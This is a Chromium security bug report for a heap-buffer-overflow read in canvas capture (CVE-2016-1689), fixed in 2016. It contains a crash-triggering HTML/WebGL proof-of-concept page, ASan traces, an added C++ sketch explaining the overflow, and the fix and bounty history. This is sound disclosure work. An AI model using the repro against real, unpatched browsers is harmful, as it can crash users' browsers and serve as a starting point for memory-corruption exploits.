Issue metadata

Status: Fixed
Closed: Apr 2016
Pri: 1
Type: Bug-Security




Issue 606185: Heap-buffer-overflow in CopyAlphaChannelIntoVideoFrame

Reported by attek...@gmail.com, Apr 24 2016

Issue description

Tested on:

OS: Ubuntu 14.04

Chromium: asan-symbolized-linux-release-389396

Repro-file:

<html>
<head>
<script type='text/javascript'>
function boom() {
    var gl = canvas.getContext('experimental-webgl');
    video.srcObject = canvas.captureStream(0);
}
</script>
</head>
<body onload='boom();'>
    <video id='video' width='-602569' height='256'></video>
    <canvas id='canvas' width='256' height='257'></canvas>


ASAN-trace:

==10336==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7ff04ad9bc03 at pc 0x55ea817465f3 bp 0x7ffc6bbab050 sp 0x7ffc6bbab048
READ of size 1 at 0x7ff04ad9bc03 thread T0 (chrome)
    #0 0x55ea817465f2 in (anonymous namespace)::CopyAlphaChannelIntoVideoFrame(unsigned char const*, scoped_refptr<media::VideoFrame> const&) /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../content/renderer/media/canvas_capture_handler.cc:34
    #1 0x55ea81745667 in CreateNewFrame /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../content/renderer/media/canvas_capture_handler.cc:261 (discriminator 1)
    #2 0x55ea7c08722b in notifyListenersCanvasChanged /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/core/html/HTMLCanvasElement.cpp:421 (discriminator 1)
    #3 0x55ea7b0fd2ac in callInternal<0> /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/wtf/Functional.h:318 (discriminator 2)
    #4 0x55ea7b0fcffa in WTF::PartBoundFunctionImpl<(WTF::FunctionThreadAffinity)1, std::__1::tuple<blink::CrossThreadWeakPersistentThisPointer<blink::WebGLRenderingContextBase>&&>, WTF::FunctionWrapper<void (blink::WebGLRenderingContextBase::*)()>>::operator()() /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/wtf/Functional.h:309
    #5 0x55ea85734684 in prepareMailbox /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/platform/graphics/gpu/DrawingBuffer.cpp:251 (discriminator 1)
    #6 0x55ea81cde959 in PrepareTextureMailbox /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/blink/web_external_texture_layer_impl.cc:74
    #7 0x55ea843893cc in Update /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/layers/texture_layer.cc:208
    #8 0x55ea8446412e in DoUpdateLayers /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/trees/layer_tree_host.cc:1027 (discriminator 1)
    #9 0x55ea84463847 in cc::LayerTreeHost::UpdateLayers() /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/trees/layer_tree_host.cc:901 (discriminator 2)
    #10 0x55ea84539446 in BeginMainFrame /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/trees/proxy_main.cc:207 (discriminator 1)
.
.
.
0x7ff04ad9bc03 is located 3 bytes to the right of 263168-byte region [0x7ff04ad5b800,0x7ff04ad9bc00)
allocated by thread T0 (chrome) here:
    #0 0x55ea7571d48b in operator new(unsigned long) ??:?
    #1 0x55ea75bde912 in __allocate /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../buildtools/third_party/libc++/trunk/include/new:168
    #2 0x55ea75bde56b in __append /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../buildtools/third_party/libc++/trunk/include/vector:1039 (discriminator 4)
    #3 0x55ea8174526b in CreateNewFrame /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../content/renderer/media/canvas_capture_handler.cc:228
    #4 0x55ea7c08722b in notifyListenersCanvasChanged /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/core/html/HTMLCanvasElement.cpp:421 (discriminator 1)
    #5 0x55ea7b0fd2ac in callInternal<0> /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/wtf/Functional.h:318 (discriminator 2)
    #6 0x55ea7b0fcffa in WTF::PartBoundFunctionImpl<(WTF::FunctionThreadAffinity)1, std::__1::tuple<blink::CrossThreadWeakPersistentThisPointer<blink::WebGLRenderingContextBase>&&>, WTF::FunctionWrapper<void (blink::WebGLRenderingContextBase::*)()>>::operator()() /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/wtf/Functional.h:309
    #7 0x55ea85734684 in prepareMailbox /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../third_party/WebKit/Source/platform/graphics/gpu/DrawingBuffer.cpp:251 (discriminator 1)
    #8 0x55ea81cde959 in PrepareTextureMailbox /mnt/data/b/build/slave/ASAN_Release__symbolized_/build/src/out/Release/../../cc/blink/web_external_texture_layer_impl.cc:74
.
.
.
Attachment: chrome-heap-buffer-overflow-CopyAlphaChannelIntoVideoFrame-min.html (328 bytes)
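Reading the trace above: a 256x257 RGBA canvas is 256*257*4 = 263168 bytes, exactly the region ASan reports, and the faulting read sits 3 bytes past its end, that is, the alpha byte of the first pixel beyond the buffer. The C++ sketch below is an added illustration, not Chromium's code; it assumes (as the fix title "Fix odd size and visible rect issues" in the later commit suggests, though the report does not spell it out) that the copy loop was bounded by a frame size rounded up to even height, and shows a copy bounded by the visible size with explicit length checks instead.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Constructed model of a canvas-capture alpha copy; not Chromium's code.
// Assumption (suggested by the fix title "odd size and visible rect issues",
// not spelled out in the report): the frame's coded size was the canvas size
// rounded up to even, and the alpha-copy loop ran over that coded size while
// reading the source linearly (pixel i -> rgba[4 * i + 3]).
struct Size { int width; int height; };

static Size RoundUpToEven(Size s) {
  return {(s.width + 1) & ~1, (s.height + 1) & ~1};
}

// Byte offset of the first alpha read that a loop over |loop| pixels would
// make past the end of a |src|-sized RGBA buffer, or -1 if every read fits.
static long FirstOutOfBoundsAlphaRead(Size src, Size loop) {
  if (loop.width <= 0 || loop.height <= 0) return -1;
  const size_t src_bytes =
      src.width > 0 && src.height > 0 ? (size_t)src.width * src.height * 4 : 0;
  const size_t loop_pixels = (size_t)loop.width * loop.height;
  if (loop_pixels * 4 <= src_bytes) return -1;
  const size_t first_bad_pixel = src_bytes / 4;  // first pixel past |src|
  return (long)(first_bad_pixel * 4 + 3);         // its alpha byte
}

// Hardened copy: the loop is bounded by the visible (source) size, the
// destination plane must hold it, and both buffer lengths are checked
// instead of being trusted.
static bool CopyAlphaChannel(const std::vector<uint8_t>& rgba, Size src,
                             std::vector<uint8_t>& alpha_plane, Size coded,
                             int dst_stride) {
  if (src.width <= 0 || src.height <= 0) return false;
  if (src.width > coded.width || src.height > coded.height) return false;
  if (dst_stride < coded.width) return false;
  if (rgba.size() < (size_t)src.width * src.height * 4) return false;
  if (alpha_plane.size() < (size_t)dst_stride * coded.height) return false;
  for (int y = 0; y < src.height; ++y) {
    for (int x = 0; x < src.width; ++x) {
      const size_t s = ((size_t)y * src.width + x) * 4 + 3;
      alpha_plane[(size_t)y * dst_stride + x] = rgba[s];
    }
  }
  return true;
}
```

With the page's 256x257 canvas, FirstOutOfBoundsAlphaRead reports offset 263171, matching the ASan address 3 bytes to the right of the 263168-byte region.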

Comment 1 by ClusterFuzz, Apr 25 2016

Project Member
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5359497547087872

Comment 2 by ClusterFuzz, Apr 25 2016

Project Member
Labels: Stability-Memory-AddressSanitizer Security_Impact-Beta
Status: Available (was: Unconfirmed)

Comment 3 by vakh@chromium.org, Apr 25 2016

Components: Blink>Canvas
Labels: Security_Severity-Medium
Owner: emir...@chromium.org

Comment 4 by vakh@chromium.org, Apr 25 2016

Labels: M-50

Comment 5 by ClusterFuzz, Apr 25 2016

Project Member
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5359497547087872

Uploader: mbarbella@google.com
Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: Heap-buffer-overflow READ 1
Crash Address: 0x7f2e7f0dbc03
Crash State:
  content::CanvasCaptureHandler::CreateNewFrame
  blink::HTMLCanvasElement::notifyListenersCanvasChanged
  blink::DrawingBuffer::prepareMailbox
  
Recommended Security Severity: Medium

Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=383194:384397

Minimized Testcase (0.24 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94l7X-qyBPdRIuTKqUlDlH0kv8cP1Lq6QSLgAMPUtldHU8K1-9kMPh9OVsyiIGwOiiExwprye0aSKuJyA23SADAdO5fSA4EeFmLpzjTKWHJbYeCrV-IdXDPz9vRSBKyLIQElJGa_FD-gQHWR1RkMTI4PmJ3Qw
<script>
function boom() {
    var gl = canvas.getContext('experimental-webgl');
    video.srcObject = canvas.captureStream();
}
</script>
<body onload='boom();'<video id='video'></video>
    <canvas id='canvas' width='256' height='257'>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

Comment 6 by sheriffbot@chromium.org, Apr 25 2016

Project Member
Labels: -Security_Impact-Beta Security_Impact-Stable

Comment 7 by ClusterFuzz, Apr 25 2016

Project Member
Labels: Pri-1
Status: Assigned (was: Available)

Comment 8 by bugdroid1@chromium.org, Apr 26 2016

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/e0dd9f840b3a21cd12bd3d83f5ca63302549dd21

commit e0dd9f840b3a21cd12bd3d83f5ca63302549dd21
Author: emircan <emircan@chromium.org>
Date: Tue Apr 26 21:37:52 2016

Fix odd size and visible rect issues in CanvasCaptureHandler

This CL addresses odd size frame problems found by fuzz tests.

BUG= 606185 
TEST=Minimized fuzz test case now passes. Also added unit tests.

Review URL: https://codereview.chromium.org/1918073003

Cr-Commit-Position: refs/heads/master@{#389899}

[modify] https://crrev.com/e0dd9f840b3a21cd12bd3d83f5ca63302549dd21/content/renderer/media/canvas_capture_handler.cc
[modify] https://crrev.com/e0dd9f840b3a21cd12bd3d83f5ca63302549dd21/content/renderer/media/canvas_capture_handler_unittest.cc

Comment 9 by emir...@chromium.org, Apr 26 2016

Status: Fixed (was: Assigned)

Comment 10 by ClusterFuzz, Apr 27 2016

Project Member
Labels: -Restrict-View-SecurityTeam Merge-Triage M-51 Restrict-View-SecurityNotify
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

- Your friendly ClusterFuzz

Comment 11 by ClusterFuzz, Apr 28 2016

Project Member
ClusterFuzz has detected this issue as fixed in range 389884:390115.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5359497547087872

Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=383194:384397
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=389884:390115

If you suspect that the result above is incorrect, try re-doing that job on the test case report page.

Comment 12 by emir...@chromium.org, Apr 29 2016

Issue 608055 has been merged into this issue.

Comment 13 by timwillis@google.com, May 9 2016

Cc: timwillis@chromium.org
Labels: -Merge-Triage Merge-Request-51

Comment 14 by tin...@google.com, May 9 2016

Labels: -Merge-Request-51 Merge-Approved-51 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M51 (branch: 2704)

Comment 15 by bugdroid1@chromium.org, May 10 2016

Project Member
Labels: -merge-approved-51 merge-merged-2704
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/8618a80561b51f948a49998beaa0489d64da896e

commit 8618a80561b51f948a49998beaa0489d64da896e
Author: emircan <emircan@chromium.org>
Date: Tue May 10 17:19:26 2016

Fix odd size and visible rect issues in CanvasCaptureHandler

This CL addresses odd size frame problems found by fuzz tests.

BUG= 606185 
TEST=Minimized fuzz test case now passes. Also added unit tests.

Review URL: https://codereview.chromium.org/1918073003

Cr-Commit-Position: refs/heads/master@{#389899}
(cherry picked from commit e0dd9f840b3a21cd12bd3d83f5ca63302549dd21)

NOTRY=true
NOPRESUBMIT=true

Review-Url: https://codereview.chromium.org/1962993002
Cr-Commit-Position: refs/branch-heads/2704@{#476}
Cr-Branched-From: 6e53600def8f60d8c632fadc70d7c1939ccea347-refs/heads/master@{#386251}

[modify] https://crrev.com/8618a80561b51f948a49998beaa0489d64da896e/content/renderer/media/canvas_capture_handler.cc
[modify] https://crrev.com/8618a80561b51f948a49998beaa0489d64da896e/content/renderer/media/canvas_capture_handler_unittest.cc

Comment 16 by timwillis@google.com, May 24 2016

Labels: reward-topanel Release-0-M51

Comment 17 by timwillis@google.com, May 26 2016

Labels: -reward-topanel CVE-2016-1689 reward-unpaid reward-1000
Atte - $1,000 for this report. Congrats :)

CVE-ID is CVE-2016-1689.

Comment 18 by awhalley@chromium.org, Jul 1 2016

Labels: -reward-unpaid reward-inprocess

Comment 19 by sheriffbot@chromium.org, Aug 3 2016

Project Member
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 20 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 21 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 22 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 23 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
